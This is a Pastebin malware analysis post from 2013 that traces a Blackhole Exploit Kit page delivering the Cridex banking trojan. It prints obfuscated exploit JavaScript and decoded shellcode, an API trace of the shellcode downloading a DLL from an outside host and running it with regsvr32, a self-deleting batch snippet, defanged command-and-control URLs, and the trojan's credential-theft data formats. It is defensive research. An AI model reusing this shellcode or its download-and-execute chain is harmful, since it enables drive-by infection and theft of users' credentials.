SHARE
TWEET

#MalwareMustDie - New Cridex Payload Mar 06 2013

MalwareMustDie Mar 5th, 2013 248 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ==================================================================
  2. #MalwareMustDie! bash-2・02$ date
  3. Tue Mar  5 09:04:35  2013 @unixfreaxjp
  4. Proof of Concept of a NEW ACTIVE malware infector:
  5. IP: 46・4・77・145
  6. URL: h00p://46・4・77・145:8080/forum/links/column・php
  7. Verdict: Blackhole Exploit Kit 2・x
  8. Malware payload: Cridex
  9. ==================================================================
  10.  
  11. --2013-03-06 01:57:44--  h00p://46・4・77・145:8080/forum/links/column・php
  12. seconds 0・00, Connecting to 46・4・77・145:8080・・・ seconds 0・00, connected・
  13.   :
  14. GET /forum/links/column・php HTTP/1・0
  15. Referer: http://google・com/
  16. Host: 46・4・77・145:8080
  17. HTTP request sent, awaiting response・・・
  18.   :
  19. HTTP/1・1 200 OK
  20. Server: nginx/1・0・10
  21. Date: Tue, 05 Mar 2013 16:57:21 GMT
  22. Content-Type: text/html; charset=CP-1251
  23. Connection: close
  24. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  25. Vary: Accept-Encoding
  26. 200 OK
  27. Length: unspecified [text/html]
  28. Saving to: `column・php'
  29. 2013-03-06 01:57:47 (81・2 KB/s) - `column・php' saved [156811]
  30.  
  31.  
  32. $ cat ・/column・php
  33.  
  34.    :
  35.    :
  36. function getShellCode(){
  37.   var a = "
  38. 8200!%a482!%9551!%e034!%51c4!%e5c4!%34e0!%5191!%e0d4!%9174!%2421!%2191!%b191!%3421!%2191!%
  39. 9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%a5d4!%e4e0!%2191!%a1e5!%4421!%2191!%
  40. 9144!%f521!%51a1!%54e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%
  41. 70e4!%0181!%0181!%d121!%91c1!%f160!%60f1!%60c1!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%
  42.   :
  43. 0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%
  44. b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%
  45. 964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%
  46. fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%
  47. e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%
  48. 0382!%ef08!%9ed0!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%"・split("")・reverse()・
  49.   join("");
  50.   return a["replace"](/\%!/g, "%" + "u")
  51. }
  52.   :
  53.  
  54. // decoded・・・
  55.  
  56. var a = "8200!%a482!%9551!%e034!%51c4!%e5c4!%34e0!%5191!%e0d4!%9174!%2421!%2191!%b191!%3421!%2191!%
  57. 9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%a5d4!%e4e0!%2191!%a1e5!%4421!%2191!%
  58. 9144!%f521!%51a1!%54e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%
  59. 70e4!%0181!%0181!%d121!%91c1!%f160!%60f1!%60c1!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%
  60. eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%
  61.   :
  62. 0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%
  63. b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%
  64. 964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%
  65. fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%
  66. e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%
  67. 0382!%ef08!%9ed0!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%"・split("")・reverse()・join("");
  68. var xxx=  a["replace"](/\%!/g, "%" + "u");
  69. document・write(xxx);
  70.  
  71. // into shellcodes・・・
  72.  
  73. %u4141%u4141%u8366%ufce4%uebfc%u581O%uc931%u8166%uOde9%u8Ofe%u283O%ue24O%uebfa%ue8O5%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u2O5e%uf31b%ua34e%u1476%u5c2b%uO41b%uc6a9%u383d%ud7d7%ua39O%u1868%u6eeb%u2e11%ud35d%u1caf%uadOc%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b5O%u7edd%u5ea3%u2bO8%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda1O%u2O5c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%uOc76%uf52b%ua34e%u6324%u6ea5%ud7c4%uOc7c%ua324%u2bfO%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%uO84O%u55a8%u1b24%u2b5c%uc3be%ua3db%u2O4O%udfa3%u2d42%ucO71%ud7bO%ud7d7%ud1ca%u28cO%u2828%u7O28%u4278%u4O68%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u474O%u2846%u4O28%u5a5d%u4544%ud77c%uab3e%u2Oec%ucOa3%u49cO%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%uOc74%uef24%uOc2c%u4d5a%u5b4f%u6cef%u2cOc%u5a5e%u1a1b%u6cef%u2OOc%uO5O8%uO85b%u4O7b%u28dO%u2828%u7ed7%ua324%u1bcO%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4cO6%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6caO%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u2O7e%ub4cO%ud7d6%ua6d7%u2666%ubOc4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%uO732%u4O58%u5c5c%u1258%uO7O7%u1e1c%u1cO6%u1fO6%uO61f%u1c19%u121d%u181O%u181O%u4eO7%u5a47%u455d%u44O7%u4641%u5b43%u4bO7%u4447%u455d%uO646%u4O58%u1758%u4e45%u1a15%u125f%u4419%u1912%u1244%u5e1a%u1912%uOe4e%u4d5a%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u4dOe%u1915%uOe43%u4c5e%u4c15%u43Oe%u1559%u284a%uOO28";
  74.  
  75. // translate per api references・・・
  76.  
  77. 0x7c801ad9 kernel32・VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  78. 0x7c801d7b kernel32・LoadLibraryA(lpFileName=urlmon)
  79. 0x7c835dfa kernel32・GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  80. 0x1a494bbe urlmon・URLDownloadToFileA(pCaller=0, szURL=h00p://46・4・77・145:8080/forum/links/column・php?mf=2w:1l:1l:2v:1f&re=2v:1k:1m:32:33:1k:1k:31:1j:1o&e=1k&vd=d&kq=b, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll)
  81. 0x7c86250d kernel32・WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  82. 0x7c86250d kernel32・WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
  83. 0x7c81cb3b kernel32・TerminateThread(dwExitCode=0)
  84.  
  85. // payload url・・
  86.  
  87. h00p://46・4・77・145:8080/forum/links/column・php?mf=2w:1l:1l:2v:1f&re=2v:1k:1m:32:33:1k:1k:31:1j:1o&e=1k&vd=d&kq=b
  88.  
  89. // download payload・・・ (for backup the PoC I uploaded here too: http://urlquery・net/report・php?id=1268437 )
  90.  
  91. --2013-03-06 02:09:26--  h00p://46・4・77・145:8080/forum/links/column・php?mf=2w:1l:1l:2v:1f&re=2v:1k:1m:32:33:1k:1k:31:1j:1o&e=1k&vd=d&kq=b
  92. seconds 0・00, Connecting to 46・4・77・145:8080・・・ seconds 0・00, connected・
  93.   :
  94. GET /forum/links/column・php?mf=2w:1l:1l:2v:1f&re=2v:1k:1m:32:33:1k:1k:31:1j:1o&e=1k&vd=d&kq=b HTTP/1・0
  95. Host: 46・4・77・145:8080
  96. HTTP request sent, awaiting response・・・
  97.   :
  98. HTTP/1・1 200 OK
  99. Server: nginx/1・0・10
  100. Date: Tue, 05 Mar 2013 17:09:03 GMT
  101. Content-Type: application/x-msdownload
  102. Connection: keep-alive
  103. X-Powered-By: PHP/5・3・18-1~dotdeb・0
  104. Pragma: public
  105. Expires: Tue, 05 Mar 2013 17:09:04 GMT
  106. Cache-Control: must-revalidate, post-check=0, pre-check=0
  107. Cache-Control: private
  108. Content-Disposition: attachment; filename="readme・exe"
  109. Content-Transfer-Encoding: binary
  110. Content-Length: 102400
  111. 200 OK
  112. Length: 102400 (100K) [application/x-msdownload]
  113. Saving to: `readme・exe'
  114. 2013-03-06 02:09:28 (53・1 KB/s) - `readme・exe' saved [102400/102400]
  115.  
  116. //Faking MS Application (again・・・)
  117.  
  118. StringFileInfo
  119. CompanyName
  120. Microsoft Corporation
  121. FileDescription
  122. OLE DocFile Property Page
  123. FileVersion
  124. 6・0・6000・16386 (vista_rtm・061101-2205)
  125. InternalName
  126. docprop・dll
  127. LegalCopyright
  128. Microsoft Corporation・ All rights reserved・
  129. OriginalFilename
  130. docprop・dll
  131. ProductName
  132. Microsoft
  133. Windows
  134. Operating System
  135. ProductVersion
  136. VarFileInfo
  137. Translation
  138.  
  139.  
  140. // Self deletion batch file:
  141. @echo off
  142. del /F /Q /A "%S"
  143. if exist "%S" goto R
  144. del /F /Q /A "%S"
  145.  
  146. // Wrote files
  147.  
  148. %Temp%\exp1・tmp・bat
  149. %Temp%\exp*・tmp・exe
  150. %AppData%\KB00927107・exe
  151.  
  152. // Malware Process:
  153.  
  154. C:\WINDOWS\system32\cmd・exe" /c "C:\DOCUME~1\<USER>~1\LOCALS~1\Temp\exp1・tmp・bat""
  155. C:\Documents and Settings\<USER>\Application Data\KB00927107・exe
  156. C:\DOCUME~1\<USER>~1\LOCALS~1\Temp\exp*・tmp・exe
  157.  
  158. // Cridex Callbacks・・・
  159. h00p://209・17・186・246:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  160. h00p://203・171・234・53:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  161. h00p://64・85・53・168:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  162. h00p://161・246・35・117:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  163. h00p://202・29・5・195:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  164. h00p://213・214・74・5:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  165. h00p://174・121・67・199:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  166. h00p://174・143・234・138:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  167. h00p://18・79・3・253:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  168. h00p://141・219・153・206:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  169. h00p://72・251・206・90:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  170. h00p://149・156・96・9:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  171. h00p://212・68・63・82:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  172. h00p://88・119・156・20:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  173. h00p://91・199・155・222:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  174. h00p://194・249・217・8:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  175. h00p://109・168・106・162:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  176. h00p://85・214・143・90:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  177. h00p://195・191・22・97:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  178. h00p://188・138・96・241:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  179. h00p://31・3・103・101:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  180. h00p://213・251・164・83:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  181. h00p://82・100・228・130:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  182. h00p://194・97・99・120:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  183. h00p://78・47・153・131:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
  184.  
  185. // Cridex sent Credential formats:
  186. application/x-www-form-urlencoded
  187. <http time="%%%uu"><url><![CDATA[%%・%us]]></url><useragent><![CDATA[%%・%us]]></useragent><data><![CDATA[
  188. ]]></data></http>
  189. <httpshot time="%%%uu"><url><![CDATA[%%・%us]]></url><data><![CDATA[
  190. ]]></data></httpshot>
  191. <ftp time="%%%uu"><server><![CDATA[%%u・%%u・%%u・%%u:%%u]]></server><user><![CDATA[%%・%us]]></user><pass><![CDATA[
  192. ]]></pass></ftp>
  193. <pop3 time="%%%uu"><server><![CDATA[%%u・%%u・%%u・%%u:%%u]]></server><user><![CDATA[%%・%us]]></user><pass><![CDATA[
  194. ]]></pass></pop3>
  195. <cmd id="%u">%u</cmd>
  196. <cert time="%u"><pass><![CDATA[
  197. ]]></pass><data><![CDATA[
  198. ]]></data></cert>
  199. <ie time="%u"><data><![CDATA[
  200. ]]></data></ie>
  201. <ff time="%u"><data><![CDATA[
  202. ]]></data></ff>
  203. <mm time="%u"><data><![CDATA[
  204. ]]></data></mm>
  205. <message set_hash="%%・%us" req_set="%%%%u" req_upd="%%%%u"><header><unique>%%・%us</unique><version>%%u</version><system>%%u</system><network>%%u</network></header><data>
  206. MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7k8IISlrVm8zezmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfDLQhsnrWyjT5spwnkEgIVOv6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB
  207. </data></message>
  208.  
  209. //Credentials stealer scripts commands:
  210. settings
  211. commands
  212. hash
  213. httpshots
  214. formgrabber
  215. redirects
  216. bconnect
  217. httpinjects
  218.  
  219. //Botnets commands:
  220. Connection
  221. modify
  222. pattern
  223. replacement
  224. httpinject
  225. conditions
  226. actions
  227. redirect
  228. process
  229.  
  230. // Virus Total check・・・
  231.  
  232. URL: https://www・virustotal・com/en/file/a7a2e20afb5d04ea9798e21559d6cbbe575785d6d9d00c0693ae90a299d8d405/analysis/1362504075/
  233. SHA256: a7a2e20afb5d04ea9798e21559d6cbbe575785d6d9d00c0693ae90a299d8d405
  234. SHA1: 014fe37cd0b08936b54dabb2d44ca0901f741184
  235. MD5: 31de2e1b48a8341c3732b97e61712a56
  236. File size: 100・0 KB ( 102400 bytes )
  237. File name: docprop・dll
  238. File type: Win32 EXE
  239. Tags: peexe
  240. Detection ratio: 2 / 46 <========== VERY LOW!!!
  241. Analysis date: 2013-03-05 17:08:27 UTC ( 14 minutes ago )
  242.  
  243. Fortinet      : W32/Kryptik・ALRY!tr
  244. Kaspersky   : UDS:DangerousObject・Multi・Generic
  245.  
  246.  
  247. ----
  248. #MalwareMustDie!!
  249. @unixfreaxjp
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top